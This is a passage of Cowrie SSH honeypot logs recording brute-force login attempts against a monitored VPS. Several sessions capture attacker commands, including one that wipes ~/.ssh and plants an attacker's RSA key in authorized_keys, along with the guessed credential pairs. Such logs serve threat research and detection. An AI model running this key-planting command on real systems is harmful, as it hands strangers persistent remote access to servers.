AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:23:41.732550Z","src_ip":"139.59.14.27","session":"03e66f411488"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:23:42.090466Z","src_ip":"139.59.14.27","session":"03e66f411488"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:23:42.091419Z","src_ip":"139.59.14.27","session":"03e66f411488"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":34752,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e38b4871d92","protocol":"ssh","message":"New connection: 139.59.14.27:34752 (1.2.3.4:22) [session: 2e38b4871d92]","sensor":"my-vps","timestamp":"2025-09-08T13:23:42.385851Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:23:42.386582Z","src_ip":"139.59.14.27","session":"2e38b4871d92"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:23:42.710360Z","src_ip":"139.59.14.27","session":"2e38b4871d92"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:23:44.011445Z","src_ip":"139.59.14.27","session":"2e38b4871d92"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:23:45.339996Z","src_ip":"139.59.14.27","session":"2e38b4871d92"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":34756,"dst_ip":"1.2.3.4","dst_port":22,"session":"6fd6baa96cd4","protocol":"ssh","message":"New connection: 139.59.14.27:34756 (1.2.3.4:22) [session: 6fd6baa96cd4]","sensor":"my-vps","timestamp":"2025-09-08T13:23:45.705215Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:23:45.705872Z","src_ip":"139.59.14.27","session":"6fd6baa96cd4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:23:46.044717Z","src_ip":"139.59.14.27","session":"6fd6baa96cd4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:23:47.444372Z","src_ip":"139.59.14.27","session":"6fd6baa96cd4"}
{"eventid":"cowrie.session.closed","duration":"9.7","message":"Connection lost after 9.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:23:47.786263Z","src_ip":"139.59.14.27","session":"03e66f411488"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:23:47.788256Z","src_ip":"139.59.14.27","session":"6fd6baa96cd4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33818,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bf4f31178bc","protocol":"ssh","message":"New connection: 212.227.235.229:33818 (1.2.3.4:22) [session: 5bf4f31178bc]","sensor":"my-vps","timestamp":"2025-09-08T13:24:07.570354Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:24:07.571380Z","src_ip":"212.227.235.229","session":"5bf4f31178bc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:24:07.672215Z","src_ip":"212.227.235.229","session":"5bf4f31178bc"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":60408,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd26d67dd350","protocol":"ssh","message":"New connection: 134.199.174.250:60408 (1.2.3.4:22) [session: cd26d67dd350]","sensor":"my-vps","timestamp":"2025-09-08T13:24:08.032247Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:24:08.084888Z","src_ip":"134.199.174.250","session":"cd26d67dd350"}
{"eventid":"cowrie.login.failed","username":"monitor","password":"monitor@123","message":"login attempt [monitor/monitor@123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:24:08.143889Z","src_ip":"212.227.235.229","session":"5bf4f31178bc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:24:08.357583Z","src_ip":"134.199.174.250","session":"cd26d67dd350"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:24:09.247935Z","src_ip":"212.227.235.229","session":"5bf4f31178bc"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"qwerty123","message":"login attempt [postgres/qwerty123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:24:09.736067Z","src_ip":"134.199.174.250","session":"cd26d67dd350"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:24:11.061184Z","src_ip":"134.199.174.250","session":"cd26d67dd350"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":21420,"dst_ip":"1.2.3.4","dst_port":22,"session":"da4d92c9ab23","protocol":"ssh","message":"New connection: 49.247.35.31:21420 (1.2.3.4:22) [session: da4d92c9ab23]","sensor":"my-vps","timestamp":"2025-09-08T13:24:16.013724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:24:16.018342Z","src_ip":"49.247.35.31","session":"da4d92c9ab23"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:24:16.297058Z","src_ip":"49.247.35.31","session":"da4d92c9ab23"}
{"eventid":"cowrie.login.success","username":"root","password":"racker","message":"login attempt [root/racker] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:24:17.401201Z","src_ip":"49.247.35.31","session":"da4d92c9ab23"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:24:17.995720Z","src_ip":"49.247.35.31","session":"da4d92c9ab23"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:24:17.996382Z","src_ip":"49.247.35.31","session":"da4d92c9ab23"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:24:17.997283Z","src_ip":"49.247.35.31","session":"da4d92c9ab23"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:24:18.279766Z","src_ip":"49.247.35.31","session":"da4d92c9ab23"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:24:18.857730Z","src_ip":"49.247.35.31","session":"da4d92c9ab23"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:24:18.858450Z","src_ip":"49.247.35.31","session":"da4d92c9ab23"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:24:19.144648Z","src_ip":"49.247.35.31","session":"da4d92c9ab23"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:24:19.145649Z","src_ip":"49.247.35.31","session":"da4d92c9ab23"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":58246,"dst_ip":"1.2.3.4","dst_port":22,"session":"58d8167b2c72","protocol":"ssh","message":"New connection: 49.247.35.31:58246 (1.2.3.4:22) [session: 58d8167b2c72]","sensor":"my-vps","timestamp":"2025-09-08T13:24:19.433445Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:24:19.435652Z","src_ip":"49.247.35.31","session":"58d8167b2c72"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:24:19.720009Z","src_ip":"49.247.35.31","session":"58d8167b2c72"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:24:20.921667Z","src_ip":"49.247.35.31","session":"58d8167b2c72"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35038,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d6c162eac5e","protocol":"ssh","message":"New connection: 212.227.235.229:35038 (1.2.3.4:22) [session: 5d6c162eac5e]","sensor":"my-vps","timestamp":"2025-09-08T13:24:21.355548Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:24:21.356352Z","src_ip":"212.227.235.229","session":"5d6c162eac5e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:24:21.477998Z","src_ip":"212.227.235.229","session":"5d6c162eac5e"}
{"eventid":"cowrie.login.failed","username":"debian","password":"azerty","message":"login attempt [debian/azerty] failed","sensor":"my-vps","timestamp":"2025-09-08T13:24:22.002157Z","src_ip":"212.227.235.229","session":"5d6c162eac5e"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:24:22.234390Z","src_ip":"49.247.35.31","session":"58d8167b2c72"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":29506,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae87a1731b39","protocol":"ssh","message":"New connection: 49.247.35.31:29506 (1.2.3.4:22) [session: ae87a1731b39]","sensor":"my-vps","timestamp":"2025-09-08T13:24:22.517193Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:24:22.519879Z","src_ip":"49.247.35.31","session":"ae87a1731b39"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:24:22.804092Z","src_ip":"49.247.35.31","session":"ae87a1731b39"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:24:23.125054Z","src_ip":"212.227.235.229","session":"5d6c162eac5e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:24:23.959834Z","src_ip":"49.247.35.31","session":"ae87a1731b39"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:24:24.255277Z","src_ip":"49.247.35.31","session":"da4d92c9ab23"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:24:24.256891Z","src_ip":"49.247.35.31","session":"ae87a1731b39"}
